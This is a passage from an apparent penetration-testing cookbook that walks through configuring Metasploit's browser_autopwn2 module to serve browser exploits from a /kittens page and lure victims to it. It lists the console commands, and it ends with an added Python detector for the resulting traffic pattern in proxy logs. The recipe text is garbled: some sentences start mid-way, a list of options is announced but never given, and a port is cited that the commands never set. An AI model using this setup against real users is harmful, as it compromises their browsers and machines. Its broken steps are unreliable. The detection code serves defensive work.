Metasploit Framework includes a huge collection of client-side exploits, many of them meant to exploit known vulnerabilities in web browsers. One module can detect the version of the browser the client is using and pick the best exploit to trigger: browser_autopwn or, in its newest version, browser_autopwn2.
In this recipe, we will set up an attack with browser_autopwn2 and get it ready for a victim to come in.
use auxiliary/server/browser_autopwn2
show options
set SRVHOST 192.168.56.1
/kittens for the server to respond to:
set URIPATH /kittens
set EXCLUDE_PATTERN android|adobe_flash
show advanced
to view the full list of advanced options) for the module to show us the individual path of each exploit launched and be more verbose:
set ShowExploitList true
set VERBOSE true
Advanced options also allow us to choose the payload and its parameters, such as LHOST and LPORT, for each platform (Windows, Unix, and Android).
run
If we want to trigger a particular exploit, we may use the Path value after our server's URL; for example, if we want the firefox_svg_plugin to trigger, we send http://192.168.56.1/PWrmfJApkwWsf to the victim. Paths are generated randomly each time the module runs.
http://192.168.56.1/kittens, we will see BAP2 respond immediately and try all fitting exploits, and when it successfully executes one, it creates a session in the background.
Browser Autopwn sets up a web server with a main page that uses JavaScript to identify what software the client is running and, based on that, chooses which exploit to try with it.
In this recipe, we set our Kali machine to listen on port 8080 for requests to the kittens directory. Other options we configured were:
After that, we just need to run the module and get some users to come to our /kittens site.
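On the defending side, the behaviour described above (one main page, then randomly named exploit paths on the same server) leaves a recognizable sequence in web proxy logs. The following Python code is an added example, not part of the original recipe or of Metasploit; the log format, the thresholds and the /QzLtYbVnRe path are constructed, and treating a single mixed-case alphanumeric segment like the recipe's /PWrmfJApkwWsf as "random-looking" is an assumption.

```python
import re
from collections import defaultdict

WINDOW = 30      # seconds to watch after a landing request (assumed threshold)
MIN_RANDOM = 2   # distinct random-looking paths needed to alert (assumed threshold)
RANDOM_PATH = re.compile(r"^/[A-Za-z0-9]{8,}$")

# Constructed proxy log: epoch seconds, client IP, server host, request path.
SAMPLE_LOG = """\
1700000000 10.0.0.5 192.168.56.1 /kittens
1700000001 10.0.0.5 192.168.56.1 /PWrmfJApkwWsf
1700000002 10.0.0.5 192.168.56.1 /QzLtYbVnRe
1700000010 10.0.0.7 intranet.example /docs
1700000012 10.0.0.7 intranet.example /docs/index
this line is malformed
1700000020 10.0.0.9 192.168.56.1 /kittens
"""

def looks_random(path):
    """True for one mixed-case alphanumeric segment of 8+ characters."""
    seg = path[1:]
    return bool(RANDOM_PATH.match(path)) and seg != seg.lower() and seg != seg.upper()

def parse(log):
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue  # skip malformed lines instead of failing on them
        yield int(parts[0]), parts[1], parts[2], parts[3]

def detect(log):
    """Return sorted (client, host) pairs showing landing page -> random paths."""
    visits = defaultdict(list)
    for ts, client, host, path in parse(log):
        visits[(client, host)].append((ts, path))
    hits = []
    for key, reqs in visits.items():
        reqs.sort()
        for i, (ts, path) in enumerate(reqs):
            if looks_random(path):
                continue  # only an ordinary-looking page counts as the landing page
            follow = {p for t, p in reqs[i + 1:] if t - ts <= WINDOW and looks_random(p)}
            if len(follow) >= MIN_RANDOM:
                hits.append(key)
                break
    return sorted(hits)

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

A client that only loads the main page, such as 10.0.0.9 in the sample, is not flagged; the alert needs the follow-up requests as well.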